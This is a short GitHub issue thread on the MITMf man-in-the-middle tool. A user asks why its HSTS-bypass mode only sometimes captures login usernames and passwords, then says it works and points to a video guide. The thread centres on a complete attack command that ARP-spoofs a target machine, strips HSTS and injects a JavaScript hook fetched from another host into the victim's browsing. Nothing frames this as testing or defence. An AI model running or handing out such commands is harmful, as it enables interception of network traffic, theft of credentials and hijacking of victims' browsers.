### ISSUE TITLE
--hsts does not always sniff user/pass 

### ISSUE THREAD

**Issue by Cosmic4x2** [byt3bl33d3r/MITMf#331]
Mitmf does not seem to be sniffing  user/pass on login it works sometimes but cannot seem to get it to work every time I have had it working but when i repeat the steps i do not get the same results what am I doing wrong? Thanks

mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.119 --hsts --inject --js-url http://192.168.1.112:3000/hook.js

**Comment by Cosmic4x2** [comment]
got it working

**Comment by blydro** [comment]
mind sharing how?

**Comment by Cosmic4x2** [comment]
check this video it is step by step...

https://www.youtube.com/watch?v=VP_9CHteEBU
